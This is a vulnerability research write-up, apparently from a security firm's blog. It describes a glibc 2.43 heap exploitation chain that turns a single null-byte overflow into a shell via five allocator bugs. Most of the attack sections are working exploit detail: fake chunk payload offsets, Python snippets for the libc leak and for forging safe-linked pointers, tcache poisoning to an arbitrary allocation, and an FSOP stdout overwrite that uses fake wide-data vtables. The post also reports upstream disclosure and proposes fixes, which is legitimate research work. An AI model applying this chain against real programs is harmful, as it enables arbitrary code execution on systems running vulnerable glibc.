01

The starting position.

A single null byte. No use-after-free in the target. No double-free. Every mitigation the toolchain offers, Full RELRO, stack canary, NX, PIE, all active. That is the starting position.

This post documents a heap exploitation technique we are calling Schrödinger's Chunk. The name captures the core primitive: a chunk that exists simultaneously in two states, allocated from the program's perspective, freed from the allocator's perspective. We manufacture this condition from nothing by chaining five bugs in glibc 2.43's own allocator code. The target program is correct. The bugs are in glibc.

The canonical entry point is a null byte overflow. But Schrödinger's Chunk is not tied to one primitive. Any corruption that creates overlapping chunk views, including uncontrolled out of bounds writes, weak single byte overwrites, or partial size corruptions, can serve as the entry point. We cover the full range of applicable primitives in a dedicated section before walking through the canonical exploit chain.

Verification

Every claim here is verified against the glibc 2.43.9000 source. All five bugs were reported to the glibc security team prior to this publication.

5
glibc bugs chained
1
Null byte to start
0
UAFs in target program
02

What changed in glibc 2.43.

Understanding Schrödinger's Chunk requires understanding glibc 2.43 specifically. Several changes in this release shifted the attack surface in ways that are not immediately obvious.

Fastbins removed

glibc 2.43 removed fastbins entirely. Everything small now flows through either the tcache (fast path) or the full consolidation machinery (_int_free_merge_chunk). There is no middle layer. This makes the tcache the sole fast allocation path for small chunks. Any bug in the tcache now affects a much larger fraction of all program allocations.

Tcache expanded to 76 bins

The tcache grew from 64 size classes (up to 0x410) to 76: 64 small bins plus 12 large bins. TCACHE_SMALL_BINS = 64, TCACHE_LARGE_BINS = 12, TCACHE_MAX_BINS = 76. The tcache_perthread_struct expanded accordingly. It now holds uint16_t num_slots[76] (152 bytes) and tcache_entry *entries[76] (608 bytes), totaling 760 bytes.

Lazy tcache initialization

This is the structurally important change. In glibc 2.35 the tcache_perthread_struct was allocated during the first malloc(). In glibc 2.43 it is allocated lazily, during the first free(). The trigger in __libc_free is:

cmalloc/malloc.c
if (__glibc_unlikely (tcache_inactive ()))
    return tcache_free_init (mem);

tcache_free_init calls tcache_init(NULL) (which calls __libc_malloc2 to allocate the struct) and then re-calls __libc_free on the original chunk. The heap layout consequence is deterministic:

layout2.35 vs 2.43
Early init (glibc 2.35):
  first malloc() → allocate tcache struct → allocate requested chunk

Lazy init (glibc 2.43):
  malloc() #1 → allocate chunk directly (no tcache yet)
  free()   #1 → allocate tcache struct via tcache_free_init → re-free chunk

Resulting layout:
  heap_base + 0x000:  first malloc chunk   (e.g. 0x20 for malloc(1))
  heap_base + 0x020:  tcache_perthread     (0x310)
  heap_base + 0x330:  second malloc chunk

Given any heap address leak, the address of every subsequent allocation is computable by arithmetic. This has a direct consequence for safe-linking.

Relaxed tcache free path

In __libc_free, when a freed chunk is tcache-eligible, glibc 2.43 takes an early return directly to tcache_put after only two checks: pointer alignment and tcache eligibility by size. The check_inuse_chunk call that existed on the tcache path in prior versions is gone. The size field is accepted as is as long as it falls within a valid tcache bin range. This is how size field corruption becomes exploitable on this version.

03

The allocator's bookkeeping.

Before diving into the bugs, here is the allocator state we are working with.

Chunks

Every heap allocation is a chunk. The header lives immediately before the user pointer and contains two 8 byte fields:

chunk layout64-bit
     chunk_ptr
         │
         ▼
    ┌───────────────────┐  ← chunk header
    │  prev_size  (8B)  │  only valid when prev chunk is free
    ├───────────────────┤
    │  size       (8B)  │  total chunk size | flags in low 3 bits
    ├───────────────────┤  ← user pointer (what malloc returns)
    │                   │
    │   user data       │
    │                   │
    └───────────────────┘

Bit 0 of size is PREV_INUSE: 1 means the preceding chunk is allocated, 0 means it is free. When PREV_INUSE is 0, prev_size is valid and tells the allocator how far back to walk to find the free predecessor.

Tcache

cstruct tcache_entry
typedef struct tcache_entry {
    struct tcache_entry *next;   // safe-linked pointer to next free chunk
    uintptr_t key;               // double-free detection token
} tcache_entry;

num_slots[i] in tcache_perthread_struct counts how many additional entries bin i can still accept. It starts at mp_.tcache_count (default 7) for an empty bin. Each free to tcache decrements it. Each allocation from tcache increments it. The guard in __libc_free for accepting a chunk into tcache is num_slots[tc_idx] != 0.

Safe-linking

Since glibc 2.32, tcache next pointers are stored encoded:

csafe-linking macros
#define PROTECT_PTR(pos, ptr) \
    ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

PROTECT_PTR(pos, ptr) computes (pos >> 12) ^ ptr. The pos >> 12 component is the XOR key, derived from the pointer's own storage address. Because ASLR operates at page granularity (12 bits), this key contains only the randomized bits. Without knowing the storage address, you cannot compute the key to forge a next pointer. In theory.

04

Five bugs in glibc 2.43.

We identified five defects in glibc 2.43's tcache implementation. Here they are in summary before showing how they connect.

01
No cycle detection
Neither tcache_put_n nor tcache_get_n checks whether the list contains a cycle. A chunk whose next field decodes back to itself creates an infinite list. Every pop returns the same address. This is the foundation of Schrödinger's Chunk.
02
Unbounded num_slots++
num_slots is a uint16_t. The logical maximum is 7. The increment in tcache_get_n has no bounds check. After two pops from a self-referencing loop the value reaches 8. The capacity guard (num_slots != 0) keeps accepting frees that should be rejected.
03
Double-free gate bypassed
Double-free detection uses a fast key check (Stage 1) to gate a slow list walk (Stage 2). But tcache_get_n unconditionally clears e->key = 0 on every pop. After our double pop, key is 0. tcache_key is non-zero. Stage 1 fails. Stage 2 never runs.
04
Deterministic lazy init
Because the tcache struct is always allocated during the first free(), and the first malloc() always lands at heap base, the layout is fixed. The safe-linking key for any chunk is addr >> 12. Pure arithmetic. No freed memory read needed.
05
Unprotected bin heads
Chain link next fields use PROTECT_PTR. The entries[idx] head pointers in tcache_perthread_struct are stored raw. Any primitive reaching the tcache struct can redirect a bin head without computing a safe-linking key.
!
Load-bearing interaction
Bug 1 without Bug 2: no inflated counter to pass the capacity guard. Bug 1 without Bug 3: Stage 2 list walk finds the cycle and aborts. Bug 3 without Bug 1: no cleared key to exploit. None of these bugs is sufficient alone. The chain is multiplicative. Each is load-bearing.

Bug 1 in detail

tcache_put_n prepends a new chunk to its bin and decrements num_slots. tcache_get_n pops the head and increments num_slots. Neither function checks whether the linked list contains a cycle.

ctcache_put_n (non-mangled path)
e->next = PROTECT_PTR (&e->next, *ep);   // store safe-linked next
*ep = e;                                  // set as new head (raw, no PROTECT_PTR)
--(tcache->num_slots[tc_idx]);
ctcache_get_n (non-mangled path)
*ep = REVEAL_PTR (e->next);              // advance head
++(tcache->num_slots[tc_idx]);
e->key = 0;
return (void *) e;

Neither operation checks whether the chunk being inserted is already present in the list, or whether following next pointers from the new head eventually reaches NULL. A chunk whose next field decodes back to itself creates an infinite list. Without the ability to create a cycle, we cannot get malloc to return the same address twice. No duplicate address means no two independent handles to the same memory. No two handles means no manufactured UAF.

Bug 3 in detail

glibc's double-free detection uses two stages.

Stage 1 (fast gate) in __libc_free

cthe fast gate
if (__glibc_unlikely (e->key == tcache_key))
    return tcache_double_free_verify (e);

Stage 2 (list walk) in tcache_double_free_verify

cthe slow scan
for (size_t tc_idx = 0; tc_idx < TCACHE_MAX_BINS; ++tc_idx) {
    size_t cnt = 0;
    for (tmp = tcache->entries[tc_idx]; tmp;
         tmp = REVEAL_PTR(tmp->next), ++cnt) {
        if (cnt >= mp_.tcache_count)
            malloc_printerr ("free(): too many chunks detected in tcache");
        if (tmp == e)
            malloc_printerr ("free(): double free detected in tcache 2");
    }
}

The list walk scans every tcache bin for the chunk being freed. With a self-referencing loop, tmp would equal e on the very first iteration. Stage 2 would catch it immediately.

But Stage 2 only runs if Stage 1 passes. The problem is what tcache_get_n does on every pop: e->key = 0. The key is unconditionally cleared on every allocation. After our double pop from the self-referencing loop, the chunk's key is 0. When we re-free the chunk, the Stage 1 check evaluates (0 == tcache_key) as false. Stage 2 never runs. The list walk that would have caught the double-free does not execute.

05

Entry points and primitives.

Schrödinger's Chunk requires one thing from the bug in your target: an overlapping chunk, a situation where one live, program-visible handle and one allocator-visible free chunk reference the same physical memory. Once you have that, the rest of the chain (self-referencing loop, schr allocation, manufactured UAF, tcache poison) runs from glibc's own bugs.

What overlap means concretely

Program view: "M is live, I can read and write through it."

Allocator view: "M is free, it is in a bin."

Reading through the program handle reads allocator metadata. Writing through it corrupts allocator metadata. Any corruption path that leaves these two views inconsistent is sufficient. The five glibc bugs do not care how the overlap was created.

Path A · Null byte overflow (canonical)

Bug class: off-by-one null byte write past a heap buffer.

Mechanism: the null byte at buf[n] lands on byte 0 of the adjacent chunk's size field, clearing PREV_INUSE (bit 0). When that adjacent chunk is freed, the allocator walks backward by prev_size bytes, finds a fake free chunk we constructed in our live buffer, passes the self-pointing unlink check, and merges. The merged chunk goes into the unsorted bin, but our live handle still covers that same memory.

mechanicspath A
Before:
  ┌──────────────────┬──────────────────┐
  │  [prev]  0x510   │  [victim] 0x500  │
  │  in use          │  PREV_INUSE=1    │
  └──────────────────┴──────────────────┘

After null byte at offset 0x508 (clears victim's PREV_INUSE):
  ┌──────────────────┬──────────────────┐
  │  [prev]  0x510   │  [victim] 0x500  │
  │  in use          │  PREV_INUSE=0 ←  │
  └──────────────────┴──────────────────┘

After free(victim):
  ┌────────────────────────────────────────────────────────────┐
  │  [merged]  0xA00   in unsorted bin                         │
  │                                                            │
  │  prev handle still valid → overlap achieved                │
  └────────────────────────────────────────────────────────────┘
Path A mechanics · deterministic when layout conditions are met

Path B · Uncontrolled out of bounds write

Bug class: an OOB write where the position is attacker controlled (or predictable) but the bytes written are not. Audio data, network payload echoes, timer values, or any structured host-provided content.

Mechanism: glibc 2.43's __libc_free on the tcache path performs essentially no size field validation. If we can corrupt the low byte of an adjacent chunk's size field, we can make the allocator believe the chunk is a different size than it actually is. We then free that chunk and it enters the wrong tcache bin. When we reclaim from that bin we get a chunk that is "larger" than the actual allocation, overlapping the chunk after it.

Path C · Controlled single byte write

Bug class: an arbitrary single byte write, one byte, attacker chosen value, attacker chosen address.

With one controlled byte you can write any value to byte 0 of a target chunk's size field. This gives full control over the low byte, allowing deterministic corruption to a specific larger size (e.g., 0x200 → 0x280). The rest of the path is identical to Path B, but without probability uncertainty. This is the strongest single byte variant.

Path D · Multi-byte overflow with partial control

An overflow where some bytes are attacker controlled and others are not. The more bytes of control you have, the more flexibility you gain in choosing the target size class and the consolidation distance.

Path E · Use-after-free with write capability

A real UAF in the target program. With a dangling pointer to a freed chunk, creating the overlap is direct. Schrödinger's Chunk augments this path by enabling the self-referencing loop and the double-pop UAF manufacture, potentially turning a one-shot tcache poison into a persistent UAF primitive.

Entry Bytes controlled Mechanism Reliability
Null byte overflow 0 (always \x00) PREV_INUSE clear → backward consolidation Deterministic
Uncontrolled OOB 0 (data dependent) Size field corruption → wrong tcache bin Retry based (~44%)
Controlled single byte 1 byte, chosen Size field corruption → wrong tcache bin Deterministic
Multi-byte partial Partial Size + prev_size corruption Varies
Real UAF Full write to freed chunk Direct tcache entry corruption Depends on heap leak

For all paths, once the overlap exists, Bugs 1 through 4 are the mechanism for manufacturing the use-after-free, defeating safe-linking without a freed memory read, and bypassing double-free detection. The entry point only determines how you get to the overlap. The downstream chain is the same.

06

The uncontrolled write case.

The uncontrolled case deserves deeper treatment because it is the most common class of real-world memory corruption. Many vulnerabilities in device emulators, network protocol handlers, and audio or video pipelines produce out of bounds writes where the attacker controls how many bytes overflow but not what they contain.

The question is: how do you reason about a corruption primitive when you do not know the bytes?

Frame it as a search problem

You need the corrupted low byte of the size field to satisfy:

  • byte & 0x0F == 0 (16 byte alignment, mandatory)
  • byte & 0x02 == 0 (IS_MMAPPED clear, otherwise abort)
  • byte != 0x00 (zero means PREV_INUSE clear and size shrinks)
  • The resulting full size falls within a valid tcache bin range

Across the 256 possible byte values, roughly 112 (about 44%) satisfy all constraints and produce a valid tcache-eligible size. For a uniformly random byte, the probability per attempt is approximately 44%.

In practice, data is not uniformly random. For audio (u8 PCM silence is 0x80), the distribution clusters around 0x80 = 0b10000000. 0x80 & 0x0F == 0 (aligned), 0x80 & 0x02 == 0 (not IS_MMAPPED). This is a valid byte. For ALSA audio data during quiet periods, the dominant byte value directly satisfies the constraints, making reliability very high.

Retry loop structure

  1. Heap spray: build layout of repeated same size chunks.
  2. Create holes by freeing alternating chunks.
  3. Allocate overflowing buffer into a hole.
  4. Let overflow occur (one attempt).
  5. Check: did we get a useful size corruption? Try allocating from the expected target bin. If it returns a chunk that overlaps our spray region, success. If not, free the buffer, refill the hole, return to step 3.
  6. On success, proceed with the overlap.

The retry adds allocation noise. To prevent that noise from disrupting the heap layout, the spray and hole structure should be built with enough redundancy that a few failed attempts do not destroy the geometry.

07

Initial heap layout.

The technique begins with three allocations after program startup:

layoutpost-startup
┌────────────────────────────────────────────────────────────────────────┐
│  heap_base + 0x000                                                      │
├────────────────────────────────────────────────────────────────────────┤
│  [taste]   0x20    ← first malloc() before tcache exists               │
├────────────────────────────────────────────────────────────────────────┤
│  [tcache]  0x310   ← allocated by tcache_free_init() on first free()   │
│                                                                         │
│  num_slots[i]  = 7  for all i  (mp_.tcache_count, all slots available) │
│  entries[i]    = NULL  for all i                                        │
├────────────────────────────────────────────────────────────────────────┤
│  [prev]    0x510   ← source of the null byte overflow (0x508 usable)   │
├────────────────────────────────────────────────────────────────────────┤
│  [victim]  0x500   ← consolidation target                              │
├────────────────────────────────────────────────────────────────────────┤
│  [barrier] 0x90    ← prevents top-chunk merge when victim is freed     │
├────────────────────────────────────────────────────────────────────────┤
│  [top]     ...                                                          │
└────────────────────────────────────────────────────────────────────────┘
Initial heap · deterministic by Bug 4

The layout is deterministic (Bug 4). prev's user pointer is heap_base + 0x330. We know this from the heap leak alone. No UAF needed, no guessing.

The null byte primitive: writing 0x508 bytes to prev and appending a null terminator writes \x00 at prev_user + 0x508. This address is exactly byte 0 of victim's size field. Since PREV_INUSE is bit 0 of size, this single null byte clears it.

08

Phase 1 · Backward consolidation.

Clearing PREV_INUSE on victim tells the allocator the preceding chunk is free when victim is freed. We need four things to be true for the consolidation to proceed without crashing.

  1. victim->prev_size must point back to a valid fake chunk
  2. That fake chunk must have a consistent size field
  3. The unlink integrity check (fd->bk == p && bk->fd == p) must pass
  4. The size consistency checks must pass

We satisfy all four by writing into prev's data area:

payloadprev user area
offset    value      meaning
───────────────────────────────────────────────────────────
+0x00     (any)      fake chunk's prev_size (not checked)
+0x08     0x501      fake chunk's size: 0x500 | PREV_INUSE=1
+0x10     prev_user  fake fd = self
+0x18     prev_user  fake bk = self
 ...      (any)
+0x500    0x500      victim's prev_size field
+0x508    \x00       ← null byte clears victim's PREV_INUSE

The fake chunk's chunk pointer is prev_user. We treat prev_user + 0x00 as prev_size and prev_user + 0x08 as size. Its size is 0x500.

Unlink check (fd->bk == p && bk->fd == p): with fd = bk = prev_user = p, both checks become p->bk == p and p->fd == p. True. The unlink runs and is a harmless no-op.

Size consistency checks in unlink_chunk and _int_free_merge_chunk both pass because chunksize(fake) = 0x500 equals victim->prev_size = 0x500.

When victim is freed, _int_free_merge_chunk runs:

trace_int_free_merge_chunk
Step 1: victim->size has PREV_INUSE=0  ← cleared by null byte
Step 2: read victim->prev_size = 0x500
Step 3: p = chunk_at_offset(victim, -0x500) = prev_user
Step 4: chunksize(fake) == prevsize  → 0x500 == 0x500  ✓  no abort
Step 5: unlink_chunk(fake)  → self-pointing passes check  ✓  no-op
Step 6: merged chunk at prev_user, size 0x500+0x500=0xA00
Step 7: insert into unsorted bin

The result:

statepost consolidation
Memory at prev_user (post-consolidation):

  ┌──────────────────────────────────────────────────────────────┐
  │  merged chunk (0xA00)  ·  in unsorted bin                    │
  │                                                              │
  │  prev_user+0x00:  prev_size                                  │
  │  prev_user+0x08:  size = 0xA01 (PREV_INUSE set)              │
  │  prev_user+0x10:  fd → main_arena+0x08  ← libc pointer       │
  │  prev_user+0x18:  bk → main_arena+0x08                       │
  │  ...                                                         │
  └──────────────────────────────────────────────────────────────┘
        ▲
        │  prev entry in program's tracking table still points here
        │  program believes prev is a live 0x508-byte allocation
        │  we can read and write through it
State

Overlap established. The allocator owns this memory as a free chunk. The program thinks prev is a live allocation.

09

Phase 2 · Libc leak.

The merged chunk is the only entry in the unsorted bin. The unsorted bin is a circular doubly linked list rooted in main_arena. A lone entry has fd = bk = main_arena + 0x08. These pointers sit at prev_user + 0x10 and prev_user + 0x18, inside our overlap region.

pythonlibc leak
data = show(prev)
unsorted_fd = unpack64(data[0x10:0x18])
libc_base = unsorted_fd - (main_arena_offset + 0x08)

Libc base acquired. No additional primitive required.

10

Phase 3 · Self-referencing tcache loop.

We carve a small chunk from the merged region:

allocfrom unsorted
malloc(0x88) carved from merged chunk:
  E at prev_user + 0x10  (unsorted bin allocates from the front)

After free(E):
  tcache[0x90]:  head → E
  E->next = PROTECT_PTR(&E->next, NULL) = E_user >> 12
  num_slots[0x90] = 6

Now Bug 4: the layout is deterministic, so we know E_user = prev_user + 0x10. We compute:

pythoncompute the key
safe_key  = E_user >> 12
self_loop = safe_key ^ E_user     # = PROTECT_PTR(E_user, E_user)

No reading from freed memory. Pure arithmetic.

Through the overlap we overwrite E->next (at prev_user + 0x10) with self_loop:

pythonwrite through overlap
# E_user = prev_user + 0x10
# E->next field is at E_user + 0x00 = prev_user + 0x10
struct.pack_into("<Q", overlap_buf, 0x10, self_loop)
edit(prev, overlap_buf)

Verification:

mathREVEAL_PTR
REVEAL_PTR(E->next)
  = PROTECT_PTR(&E->next, E->next)
  = (E_user >> 12) ^ ((E_user >> 12) ^ E_user)
  = E_user   ← loop back to E

The bin head never advances:

stateinfinite tcache
tcache[0x90]:

  head
   │
   ▼
  ┌──────────────┐
  │      E       │
  │  next ───────┼──► (decodes to E_user)
  └──────────────┘
        ▲    │
        └────┘
           ∞

Every pop returns E_user. The list is infinite.
11

Phase 4 · Schr allocation.

Two consecutive pops from the infinite bin:

pythondouble pop
A = malloc(0x88)   # returns E_user
B = malloc(0x88)   # returns E_user again

The program's tracking table now has:

statetwo handles, one chunk
┌─────────────────────────────────────────────────────────────┐
│  tracking_table[A]:  data = E_user,  in_use = 1             │
│  tracking_table[B]:  data = E_user,  in_use = 1             │
│                              ▲                              │
│                              └── same physical memory       │
└─────────────────────────────────────────────────────────────┘

Two independent entries. One chunk. And the num_slots overflow:

tracenum_slots progression
Initial state:       num_slots[0x90] = 7
After free(E):       num_slots[0x90] = 6
After pop A:         num_slots[0x90] = 7
After pop B:         num_slots[0x90] = 8   ← exceeds mp_.tcache_count

The counter now claims there are 8 available slots. The logical maximum is 7. No bounds check prevented this (Bug 2). The inflated count will shortly allow a free to go through that should be rejected.

12

Phase 5 · Manufacturing the use-after-free.

Current state:

statepre re-free
tracking_table[A]:  data = E_user,  in_use = 1
tracking_table[B]:  data = E_user,  in_use = 1
tcache[0x90]:  head → E → E → E → ...   (self-loop)
E->key = 0   ← cleared by both pops in tcache_get_n

We free A:

tracefree(A) → re-free
free(tracking_table[A].data):
  p = E_user
  e = (tcache_entry *) E_user

  Stage 1 gate: (e->key == tcache_key)
              = (0 == random_nonzero)
              = false  ← Bug 3 bypasses Stage 2

  tcache_double_free_verify: NEVER CALLED

  Guard: (num_slots[0x90] != 0) = (8 != 0) = true  ← Bug 2 enables this

  tcache_put(E):
    e->key = tcache_key   (chunk marked as in-tcache)
    E->next = PROTECT_PTR(E, head)  (points to current head = E_user)
    head = E_user
    num_slots[0x90] = 7

tracking_table[A]:  data = NULL,  in_use = 0   ← program cleans up A
tracking_table[B]:  data = E_user, in_use = 1  ← B untouched

The state after free(A):

statethe paradox
Physical memory at E_user:

  ┌────────────────────────────────────────────────────────────┐
  │  Allocator view:  tcache[0x90] head → THIS chunk           │
  │    E->next = some encoded pointer                          │
  │    E->key  = tcache_key                                    │
  │                                                            │
  │  Program view (through tracking_table[B]):                 │
  │    "live allocation at E_user"                             │
  │    write(B, data) → writes to E_user → WRITES TO FREED     │
  │                       TCACHE METADATA                      │
  └────────────────────────────────────────────────────────────┘
Schrödinger's Chunk

The chunk is simultaneously:

Freed. The allocator sees it at the head of tcache[0x90].

Live. The program sees it as a valid allocation through handle B.

Writing through B is a use-after-free. The target program has no UAF bug. This primitive was manufactured entirely from three glibc bugs interacting:

Bug Role
Bug 1 — no cycle detectionCreated the self-referencing loop → two handles
Bug 2 — no count boundnum_slots = 8, allowed the re-free to pass the capacity guard
Bug 3 — key clearing defeats gatee->key = 0, Stage 1 gate failed, Stage 2 list walk never ran

None of them alone is sufficient. Each is load-bearing.

13

Phase 6 · Tcache poisoning and arbitrary allocation.

Through handle B we write to E_user, overwriting E->next in the freed chunk:

pythonpoison
target     = tracking_table_addr  # program's allocation array in BSS
safe_key   = E_user >> 12          # computed, no read needed (Bug 4)
poison     = safe_key ^ target     # PROTECT_PTR(E_user, target)

write(B):  E->next = poison

The tcache chain for bin 0x90 now reads:

statechain redirected
tcache[0x90]:
  head → E_user → tracking_table → ???

Two more pops:

pythonreclaim the target
malloc(0x88)   # returns E_user  (discard — this is the freed chunk)
malloc(0x88)   # returns tracking_table  ← ARBITRARY ALLOCATION

We hold an allocation overlapping the program's own bookkeeping. By editing this allocation we can redirect any entry's data pointer to any address. Full arbitrary read and write.

stateR/W primitive
┌─────────────────────────────────────────────────────────────────┐
│  tracking_table (BSS)          ← we have an allocation here     │
│                                                                  │
│  entry[0]:  data ptr ←── WE WRITE THIS to any target address    │
│             size      ←── and this                               │
│             in_use = 1                                           │
│  entry[1]:  ...                                                  │
│                                                                  │
│  Point entry[0].data to any address → read/write via show/edit  │
└─────────────────────────────────────────────────────────────────┘
14

Phase 7 · FSOP to shell.

Full RELRO eliminates GOT overwrites. The target is stdout's _IO_FILE structure in libc's data segment.

Since glibc 2.24, the regular vtable pointer in _IO_FILE_plus (at +0xd8) is range-validated against __libc_IO_vtables on every I/O operation. Pointing it outside this range causes an abort.

However, the wide character vtable, _wide_data->_wide_vtable, has no range check. _IO_wide_data is pointed to by stdout->_wide_data (at +0xa0). Inside _IO_wide_data, _wide_vtable lives at +0xe0. This field dispatches to __doallocate (at +0x68 in _IO_jump_t) when the wide character buffer needs initialization. No validation ever touches it.

dispatchprintf → shell
printf("prompt")
    │
    ▼  stdout->vtable = _IO_wfile_jumps  (legitimate — passes range check)
    │
    ▼  _IO_wfile_xsputn → _IO_wfile_overflow
    │    (wide buffer is NULL, needs allocation)
    │
    ▼  _IO_wdoallocbuf
    │
    ▼  fp->_wide_data->_wide_vtable->__doallocate(fp)
    │       ▲ NOT range-checked
    │
    ▼  our controlled function pointer
    │
    ▼  shell

We build fake structures in the overlap region at known addresses (deterministic layout, Bug 4):

layoutfake objects
prev_user + 0x100:  fake _IO_lock_t
  ┌─────────────────┐
  │  16 bytes zero  │  ← "unlocked" state for the stdio lock
  └─────────────────┘

prev_user + 0x200:  fake _IO_wide_data
  ┌──────────────────────────────────────────────────┐
  │  ...                                             │
  │  +0xe0:  _wide_vtable ptr → prev_user + 0x300    │
  └──────────────────────────────────────────────────┘

prev_user + 0x300:  fake _IO_jump_t (wide vtable)
  ┌──────────────────────────────────────────────────┐
  │  ...                                             │
  │  +0x68:  __doallocate → win()                    │
  └──────────────────────────────────────────────────┘

Four writes into stdout via the arbitrary write primitive:

stdout field offset value written
_flags +0x00 0xFBAD2000 — clears _IO_UNBUFFERED, enables wide path
_lock +0x88 prev_user + 0x100 — our zeroed fake lock
_wide_data +0xa0 prev_user + 0x200 — our fake _IO_wide_data
vtable +0xd8 _IO_wfile_jumps — legitimate, passes range check, triggers dispatch

The vtable write is the trigger. The next printf dispatches through _IO_wfile_jumps, reaches _IO_wdoallocbuf, reads stdout->_wide_data->_wide_vtable->__doallocate, finds our controlled pointer, and calls it.

Shell.

15

The full chain.

Full chain · null byte to shellglibc 2.43
off-by-one null byte
    │
    ▼  fake chunk (fd=bk=self, size=0x501)
    │  all integrity checks satisfied
    ▼  PREV_INUSE cleared on victim
    │
    ▼  _int_free_merge_chunk: backward consolidation
       merged chunk 0xA00 at prev_user → unsorted bin
    │
    ▼  overlap: prev handle over free merged chunk
       read unsorted bin fd → libc base
    │
    ▼  carve E from overlap, free to tcache
       Bug 4 (lazy init): E_user computable → safe_key known
       write PROTECT_PTR(E,E) to E->next through overlap
       Bug 1 (no cycle detection): tcache[0x90] = E→E→E→...
    │
    ▼  double pop: A=E_user, B=E_user
       Bug 2 (no count bound): num_slots = 8, exceeds max
    │
    ▼  free(A): re-free E_user
       Bug 3 (key clearing bypasses gate): verify skipped
       Bug 2 (inflated count): tcache_put accepted
       write(B): UAF write to freed tcache metadata
    │
    ▼  tcache poison: E->next → tracking_table
       two pops → arbitrary allocation at tracking_table
    │
    ▼  arbitrary R/W via tracking_table overlay
    │
    ▼  FSOP: corrupt stdout
       _flags, _lock, _wide_data, vtable
       fake _IO_wide_data → fake _wide_vtable
       __doallocate (+0x68) → win()
    │
    ▼  shell
Full exploit chain · null byte → shell · every step verified against glibc 2.43.9000
16

What makes this different.

Prior techniques

Null byte poisoning and PREV_INUSE tricks produce chunk overlap and apply tcache poisoning from that overlap. They still need to read freed memory to recover the safe-linking key. One shot. Fixed geometry.

Schrödinger's Chunk

Synthesizes a genuine use-after-free from a program that has none. The manufactured UAF is a persistent read/write handle to freed memory, independent of the overlap region. Safe-linking key recovery is eliminated entirely. Bug 4 makes the key a function of heap base alone.

Three of the five bugs (1, 2, 3) interact tightly:

  • Bug 1 without Bug 2: the loop exists but the inflated num_slots is absent, and the re-free may be rejected by the capacity guard.
  • Bug 1 without Bug 3: the loop exists, but Stage 2 of double-free detection finds E in the list on the first scan iteration and aborts.
  • Bug 3 without Bug 1: the detection gate is bypassable only because the key was cleared by the pop, which only happened because the loop returned E twice.

The chain is multiplicative. Each bug is load-bearing.

17

Bug summary and proposed fixes.

# Location Defect Proposed fix
1 tcache_put_n
tcache_get_n
No cycle detection in tcache freelist Check in tcache_put that the new entry address differs from any existing entry. Or in tcache_get, verify the returned address differs from the previous return.
2 tcache_get_n num_slots++ has no upper bound Clamp to mp_.tcache_count on every increment.
3 tcache_get_n
__libc_free
e->key = 0 on every pop defeats the double-free gate Remove the key based gate and always walk the list. Or defer key clearing until re-free rather than on pop.
4 tcache_free_init
tcache_init
Lazy init creates a fully deterministic heap layout Add randomized padding before tcache struct allocation to break layout determinism.
5 tcache_put_n entries[] head pointers stored raw while next fields use PROTECT_PTR Apply PROTECT_PTR consistently to head pointer assignments in the non-mangled path.
18

Conclusion.

Schrödinger's Chunk demonstrates that the heap exploitation landscape on modern glibc is not settled. A performance optimization (lazy tcache init) made safe-linking keys computable. Removing one allocation path (fastbins) concentrated all small-chunk traffic onto a path with five linked defects. A single null byte is enough to start the chain. A program with no UAF, no double-free, and every compiler mitigation active ends with a shell.

The five bugs were reported to the glibc security team prior to this publication.

Authored
JBR
Jabr (0xmadvise) Founder of DarkCov. Vulnerability researcher, exploit developer.
MSH
Meshaal Research, DarkCov. Systems and memory. Paper co-author.
// Correspondence: research@darkcov.com. Discovery: 2026-03-02. Disclosure: upstream, prior to publication. Reproduction against glibc 2.43.9000 on Linux x86_64.
Research index
All papers